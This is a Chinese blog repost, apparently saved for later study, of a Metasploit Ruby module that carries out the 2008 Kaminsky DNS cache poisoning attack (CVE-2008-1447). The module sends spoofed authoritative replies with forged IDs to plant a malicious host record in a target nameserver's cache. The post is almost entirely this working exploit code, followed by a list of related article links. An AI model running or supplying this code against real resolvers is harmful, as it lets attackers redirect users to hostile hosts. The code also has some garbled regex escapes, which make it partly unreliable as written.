DNS attact, 存档以后研究

最新推荐文章于 2023-11-02 13:00:26 发布
最新推荐文章于 2023-11-02 13:00:26 发布
阅读量729 收藏
点赞数
分类专栏: 技术 文章标签: domain random server query constraints exception
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/william_lv/article/details/4022546
版权

 #require 'msf/core'
#require 'net/dns'
#require 'scruby'
#require 'resolv'
require 'Msf::Auxiliary'
module Msf
class Auxiliary::Spoof::Dns::BaliWickedHost < Msf::Auxiliary
include Exploit::Remote::Ip
def initialize(info = {})
  super(update_info(info,
   'Name'           => 'DNS BaliWicked Attack',
   'Description'    => %q{
    This exploit attacks a fairly ubiquitous flaw in DNS implementations which
    Dan Kaminsky found and disclosed ~Jul 2008.  This exploit caches a single
    malicious host entry into the target nameserver by sending random sub-domain
    queries to the target DNS server coupled with spoofed replies to those
    queries from the authoritative nameservers for the domain which contain a
    malicious host entry for the hostname to be poisoned in the authority and
    additional records sections.  Eventually, a guessed ID will match and the
    spoofed packet will get accepted, and due to the additional hostname entry
    being within baliwick constraints of the original request the malicious host
    entry will get cached.
   },
   'Author'         => [ 'I)ruid', 'hdm' ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision$',
   'References'     =>
    [
     [ 'CVE', '2008-1447' ],
     [ 'US-CERT-VU', '8000113' ],
     [ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0002.html' ],
    ],
   'Privileged'     => true,
   'Targets'        =>
    [
     ["BIND",  
      {
       'Arch' => ARCH_X86,
       'Platform' => 'linux',
      },
     ],
    ],
   'DisclosureDate' => 'Jul 21 2008'
   ))
  
   register_options(
    [
     OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
     OptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.doxpara.com']),
     OptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']),
     OptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']),
     OptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]),
     OptInt.new('TTL', [true, 'TTL for the malicious host entry', 31337]),
    ], self.class)
    
end

def auxiliary_commands
  return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" }
end
def cmd_check(*args)
  targ = args[0] || rhost()
  if(not (targ and targ.length > 0))
   print_status("usage: check [dns-server]")
   return
  end
  print_status("Using the Metasploit service to verify exploitability...")
  srv_sock = Rex::Socket.create_udp(
   'PeerHost' => targ,
   'PeerPort' => 53
  )  
  random = false
  ports  = []
  lport  = nil
  
  1.upto(5) do |i|
  
   req = Resolv::DNS::Message.new
   txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"
   req.add_question(txt, Resolv::DNS::Resource::IN::TXT)
   req.rd = 1
  
   srv_sock.put(req.encode)
   res, addr = srv_sock.recvfrom()
  
   if res and res.length > 0
    res = Resolv::DNS::Message.decode(res)
    res.each_answer do |name, ttl, data|
     if (name.to_s == txt and data.strings.join('') =~ /^([^/s]+)/s+.*red/.metasploit/.com/m)
      t_addr, t_port = $1.split(':')
      print_status(" >> ADDRESS: #{t_addr}  PORT: #{t_port}")
      t_port = t_port.to_i
      if(lport and lport != t_port)
       random = true
      end
      lport  = t_port
      ports << t_port
     end
    end
   end
  end
  
  srv_sock.close
  
  if(ports.length < 5)
   print_status("UNKNOWN: This server did not reply to our vulnerability check requests")
   return
  end
  
  if(random)
   print_status("PASS: This server does not use a static source port. Ports: #{ports.join(", ")}")
   print_status("      This server may still be exploitable, but not by this tool.")
  else
   print_status("FAIL: This server uses static source ports and is vulnerable to poisoning")
  end
end
  
def run
  target   = rhost()
  source   = Rex::Socket.source_address(target)
  sport    = datastore['SRCPORT']
  hostname = datastore['HOSTNAME'] + '.'
  address  = datastore['NEWADDR']
  recons   = datastore['RECONS']
  xids     = datastore['XIDS'].to_i
  ttl      = datastore['TTL'].to_i
  domain = hostname.match(/[^/x2e]+/x2e[^/x2e]+/x2e$/)[0]
  srv_sock = Rex::Socket.create_udp(
   'PeerHost' => target,
   'PeerPort' => 53
  )
  # Get the source port via the metasploit service if it's not set
  if sport.to_i == 0
   req = Resolv::DNS::Message.new
   txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"
   req.add_question(txt, Resolv::DNS::Resource::IN::TXT)
   req.rd = 1
  
   srv_sock.put(req.encode)
   res, addr = srv_sock.recvfrom()
  
   if res and res.length > 0
    res = Resolv::DNS::Message.decode(res)
    res.each_answer do |name, ttl, data|
     if (name.to_s == txt and data.strings.join('') =~ /^([^/s]+)/s+.*red/.metasploit/.com/m)
      t_addr, t_port = $1.split(':')
      sport = t_port.to_i
      print_status("Switching to target port #{sport} based on Metasploit service")
      if target != t_addr
       print_status("Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!")
      end
     end
    end
   end
  end
  # Verify its not already cached
  begin
   query = Resolv::DNS::Message.new
   query.add_question(hostname, Resolv::DNS::Resource::IN::A)
   query.rd = 0
   begin
    cached = false
    srv_sock.put(query.encode)
    answer, addr = srv_sock.recvfrom()
    if answer and answer.length > 0
     answer = Resolv::DNS::Message.decode(answer)
     answer.each_answer do |name, ttl, data|
      if((name.to_s + ".") == hostname  and data.address.to_s == address)
       t = Time.now + ttl
       print_status("Failure: This hostname is already in the target cache: #{name} == #{address}")
       print_status("         Cache entry expires on #{t.to_s}... sleeping.")
       cached = true
       sleep ttl
      end
     end
    end
   end until not cached
  rescue ::Interrupt
   raise $!
  rescue ::Exception => e
   print_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}")
  end
  res0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver
  print_status "Targeting nameserver #{target} for injection of #{hostname} as #{address}"
  # Look up the nameservers for the domain
  print_status "Querying recon nameserver for #{domain}'s nameservers..."
  answer0 = res0.send(domain, Net::DNS::NS)
  #print_status " Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities"
  barbs = [] # storage for nameservers
  answer0.answer.each do |rr0|
   print_status " Got an #{rr0.type} record: #{rr0.inspect}"
   if rr0.type == 'NS'
    print_status "Querying recon nameserver for address of #{rr0.nsdname}..."
    answer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname
    #print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities"
    answer1.answer.each do |rr1|
     print_status " Got an #{rr1.type} record: #{rr1.inspect}"
     res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1)
     print_status "Checking Authoritativeness: Querying #{rr1.address} for #{domain}..."
     answer2 = res2.send(domain)
     if answer2 and answer2.header.auth? and answer2.header.anCount >= 1
      nsrec = {:name => rr0.nsdname, :addr => rr1.address}
      barbs << nsrec
      print_status "  #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as"
     end
    end
   end
  end
  if barbs.length == 0
   print_status( "No DNS servers found.")
   srv_sock.close
   disconnect_ip
   return
  end
  # Flood the target with queries and spoofed responses, one will eventually hit
  queries = 0
  responses = 0
  connect_ip if not ip_sock
  print_status( "Attempting to inject a poison record for #{hostname} into #{target}:#{sport}...")
  while true
   randhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname
   # Send spoofed query
   req = Resolv::DNS::Message.new
   req.id = rand(2**16)
   req.add_question(randhost, Resolv::DNS::Resource::IN::A)
   req.rd = 1
   buff = (
    Scruby::IP.new(
     #:src   => barbs[0][:addr].to_s,
     :src   => source,
     :dst   => target,
     :proto => 17
    )/Scruby::UDP.new(
     :sport => (rand((2**16)-1024)+1024).to_i,
     :dport => 53
    )/req.encode
   ).to_net
   ip_sock.sendto(buff, target)
   queries += 1
  
   # Send evil spoofed answer from ALL nameservers (barbs[*][:addr])
   req.add_answer(randhost, ttl, Resolv::DNS::Resource::IN::A.new(address))
   req.add_authority(domain, ttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname)))
   req.add_additional(hostname, ttl, Resolv::DNS::Resource::IN::A.new(address))
   req.qr = 1
   req.ra = 1
   p = rand(4)+2*10000
   p.upto(p+xids-1) do |id|
    req.id = id
    barbs.each do |barb|
     buff = (
      Scruby::IP.new(
       #:src   => barbs[:addr].to_s,
       :src   => barb[:addr].to_s,
       :dst   => target,
       :proto => 17
      )/Scruby::UDP.new(
       :sport => 53,
       :dport => sport.to_i
      )/req.encode
     ).to_net
     ip_sock.sendto(buff, target)
     responses += 1
    end
   end
   # status update
   if queries % 1000 == 0
    print_status("Sent #{queries} queries and #{responses} spoofed responses...")
   end
   # every so often, check and see if the target is poisoned...
   if queries % 250 == 0
    begin
     query = Resolv::DNS::Message.new
     query.add_question(hostname, Resolv::DNS::Resource::IN::A)
     query.rd = 0

     srv_sock.put(query.encode)
     answer, addr = srv_sock.recvfrom()
     if answer and answer.length > 0
      answer = Resolv::DNS::Message.decode(answer)
      answer.each_answer do |name, ttl, data|
       if((name.to_s + ".") == hostname and data.address.to_s == address)
        print_status("Poisoning successful after #{queries} attempts: #{name} == #{address}")
        disconnect_ip
        return
       end
      end
     end
    rescue ::Interrupt
     raise $!
    rescue ::Exception => e
     print_status("Error querying the DNS name: #{e.class} #{e} #{e.backtrace}")
    end
   end
  end
end
end
end

阿凉Wlv
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Docker学习总结(4)——Docker镜像与容器命令
科技D人生
12-27 4219
Docker是一个开源的引擎,可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署,包括VMs(虚拟机)、bare metal、OpenStack 集群和其他的基础应用平台。  Docker通常用于如下场景: web应用的自动化打包和发布; 自动化测试和持续集成、发布; 在服务型环境中部署和调整数据库或其他的后台应用;
DNS攻击类型及应对措施大盘点
weixin_53018687的博客
11-02 4025
根据 Neustar 国际安全委员会 (NISC) 的一项新研究,在过去12个月内全球有近四分之三 的公司遭受了域名系统 (DNS) 攻击。在这些调查对象中有61%的公司遭受多次DNS攻击。 Neustar 指出,与勒索软件、分布式拒绝服务(DDoS)和有针对性的账户黑客攻击等网络攻击手段相比,网络安全人员通常对DNS攻击的关注度较低,从而导致DNS攻击所占比例越来越高,造成的破坏也越来越严重。根据Neustar最新研究表明,55%的网络安全从业者认为DNS入侵和攻击已成为一种日益严重的网络威胁,与之相比,
DNS reply flood攻击
最新发布
qq_73992463的博客
11-02 161
DNSDomain Name System)是互联网中的一种网络协议,用于将域名解析为IP地址,以便用户能够访问到指定的网站或服务。然而,DNS reply flood攻击是一种恶意行为,旨在通过发送大量的DNS响应数据包来淹没目标服务器,导致其无法正常工作。本文将全面介绍DNS reply flood攻击,包括定义、攻击方式、攻击架构、防护措施以及与其他攻击方式相比的优缺点。
常见的DNS攻击与相应的防御措施
qq_32044265的博客
04-13 2729
重点介绍安全领域比较常见的一些DNS攻击以及相应的防御措施:DNS Request Flood攻击与防御,DNS Reply Flood攻击与防御和DNS缓存投毒攻击与防御。
漏洞复现:DNS 缓存投毒的经典—— 2008年 kaminsky 漏洞
闵行小鱼塘
07-06 2498
最近研究DNS缓存投毒,那么经典的 kaminsky 漏洞自然是要尝试复现的。先用msf现成脚本,再根据理解自己写exp。巧合而又不幸的是:kaminsky大神陨落于2021.4.23,谨以此篇文章纪念大神传承遗志
DNS Rebinding Attack
liuyuyang1023的博客
03-18 753
DNS Rebinding Attack Examples of DNS rebinding attacks DNS rebinding attacks have been known for quite a long time. For example, Stanford Web Security Research Team posted a whitepaper about DNS rebin...
MaxScript——可编辑多边形的Attact方法
风达的专栏
04-19 2682
Interface: EditablePoattach nodeToAttach myNodeAttach a node to the Editable_Poly object. The additional node provides the transformation of the node to be attached. You can use the nodeToAttach a
Discovering Exfiltration Paths Using Reinforcement Learning with Attack Graphs(2022)
工控小白2021的博客
06-04 318
强化学习、双代理、A2C
Attract-Mode Emulator Frontend:Mame和Nestopia等街机和游戏机模拟器的前端。-开源
05-27
Attract-Mode是命令行模拟器(例如MAME,MESS和Nestopia)的图形前端。 它隐藏了底层操作系统,旨在通过操纵杆,游戏手柄或旋转拨盘进行控制,使其非常适合在街机机柜设置中使用。 Attract-Mode是开源的,可在Linux...
数据库自动化运维2-Restful API JWT and Redis authorization
renfengjun
06-20 235
上一篇文章提供了一个简单的Restful API的Demo,今天来完善一下它的验证机制。 这里使用redis存放关于用户的密码以及roles等信息,并且根据roles以及客户端请求的endpoint来完成权限验证。 redis里面存放的信息: [root@adirfj ~]# redis-cli 127.0.0.1:6379> AUTH "password" OK 127.0.0.1:637...
华安解密之DDoS攻防-03DNS原理篇DNSReplyFlood
02-24
本文来自于华为企业互动社区,由火龙果软件Anna编辑、推荐。DNS协议的基础知识我们本篇就不重复介绍了,大家可以看上一篇的介绍。今天我们直接从DNSreplyflood的攻击原理入手。前面我们也讲过,DNS查询过程通常都是基于UDP协议的,UDP协议是无连接状态的。所以这一弱点很容易被黑客所利用,DNS服务器收到DNSreply报文时,不管自己有没有发出去过解析请求,都会对这些DNSreply报文进行处理。DNSreplyflood就是黑客发送大量的DNSreply报文到DNS缓存服务器,导致缓存服务器因为处理这些DNSreply报文而资源耗尽,影响正常业务。DNSreplyflood大多都是
网络攻防技术——DNS欺骗
学习记录
02-28 5179
一、题目 本实验的目标是让学生获得对DNS(域名系统)的各种攻击的第一手经验。DNS是互联网的电话簿;它将主机名转换为IP地址,反之亦然。这种转换是通过DNS解析实现的,这种解析发生在幕后。DNS欺骗攻击以各种方式操纵此解析过程,目的是将用户误导到其他目的地,这些目的地通常是恶意的。本实验室主要研究几种DNS欺骗攻击技术。学生将首先设置和配置DNS服务器,然后在实验室环境中的目标上尝试各种DNS欺骗攻击。 第一个大实验任务(本地DNS欺骗)中进行的攻击假设攻击者位于同一本地网络上,因此可以嗅探DNS数据包。
浏览器使用华视电子设备读取身份证信息
热门推荐
笑小枫
03-04 2万+
项目中用到了使用华视电子CVR-100U、CVR-100D设备读取身份证的设备在浏览器上读取身份证信息,在浏览器使用时,需要安装浏览器的运行的插件,否则设备不好用。
检查身份证号
wangzhicheng2013的专栏
08-28 247
#include <string.h> #include <iostream> #include <cctype> bool CheckIdentification(const char *identification) { static const ushort s_weight[17] = {7, 9, 10, 5, 8, 4, 2, 1, 6, ...
推荐一组用过好几年的非常稳定的dns
酷屋江湖-老唯的博客
07-06 2万+
通常宽带或路由里,都是未设置dns,自动获取的是本地运营商推荐的dns,那些dns非常非常的不稳定,经常打不开网页或有些图片不显示,甚至更可恶的还有广告劫持,下面推荐一组用过好几年的dns,比较稳定,分享给大家 223.5.5.5 4.2.2.2 解释一下: 223.5.5.5是阿里的公共dns,另一个是223.6.6.6 4.2.2.2是google的其中一个dns,还有8.8
NTP Reply Flood Attack (NTP反射型DDos攻击)
weixin_34401479的博客
01-13 1198
简介 NTP Reply Flood Attack (NTP射型Ddos攻击)以下简称NTP_Flood是一种利用网络中NTP服务器的脆弱性(无认证,不等价数据交换,UDP协议),来进行DDos行为的攻击,本文将就此种攻击的产生原因,利用方法等进行阐述,并使用编程语言(Python,C++)对此攻击进行实现。 感谢NSFOCUS的大牛同事们(SCZ,周大同学,SAI,冰雪风谷)在日常学习工作中...
CEF会遇到的问题
tianyu的专栏 - Linux site:blog.csdn.net/wishfly
09-21 1689
https://blog.csdn.net/wanfengnianhua/article/details/53426149
DNS应答报文的解析及简单处理代码
gfover的专栏
12-14 7934
这几天因为要做一个事情,又因为没有现成的工具使用,一直在找DNS报文的相关资料,最终在国外找到一篇关于DNS的MX查找的代码,但是发现直接将它套用到A记录查询并不合适,只好继续找,直到昨晚,找到了。关于DNS发送报文的更多信息请查阅《tcp/ip卷一》 dns域名系统这一章,这里只说对DNS应答报文的一点解析处理。DNS报文结构如下:+---------------------------+---
Java校验.CER、.pem证书格式以及获取证书有效期
AXibaaa的博客
05-08 2491
public static void main(String[] args) throws CertificateException, FileNotFoundException { CertificateFactory cf = CertificateFactory.getInstance("X.509"); FileInputStream in = new FileInputStream("/Users/name/Downloads/cert.pem"); .
选择完角色直接跳出并且返回主页面:def occupation(): global player1 while True: name = input("勇士,请为您的角色命名:") print("-------------------------------------------------") print("1: 法师,伤害高,血量防御低\n" "2: 战士,伤害低,血量防御高\n" '3: 返回主页面') cf = input("%s,请选择您的职业:" % name) print("-------------------------------------------------") if cf == '1': player1 = Master_Attack('孙悟空', 4000, 700, 500, 100, 100, 30) break elif cf == '2': player1 = Warrior_Attact('澜', 5000, 500, 400, 200, 200, 40) break elif cf == '3': return # 直接返回,结束函数 else: print('输入错误,请重新输入:') continue show_player_info(_player=player1) time.sleep(1)
06-08
好的,要实现选完角色直接跳出并且返回主页面,可以对代码进行如下修改: ```python def occupation(): global player1 while True: name = input("勇士,请为您的角色命名:") print("-------------------------------------------------") print("1: 法师,伤害高,血量防御低\n" "2: 战士,伤害低,血量防御高\n" '3: 返回主页面') cf = input("%s,请选择您的职业:" % name) print("-------------------------------------------------") if cf == '1': player1 = Master_Attack('孙悟空', 4000, 700, 500, 100, 100, 30) break elif cf == '2': player1 = Warrior_Attact('澜', 5000, 500, 400, 200, 200, 40) break elif cf == '3': print('已返回主页面') return # 直接返回,结束函数 else: print('输入错误,请重新输入:') continue time.sleep(1) ``` 以上是对原代码的修改,主要是在选择“返回主页面”选项时直接使用 `return` 语句结束函数,并且在函数外部打印一条提示信息。同时,由于直接返回主页面后不需要展示角色信息,因此将 `show_player_info` 函数的调用从函数内部移到了函数外部,并且将 `time.sleep` 函数的调用也移到了函数外部。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值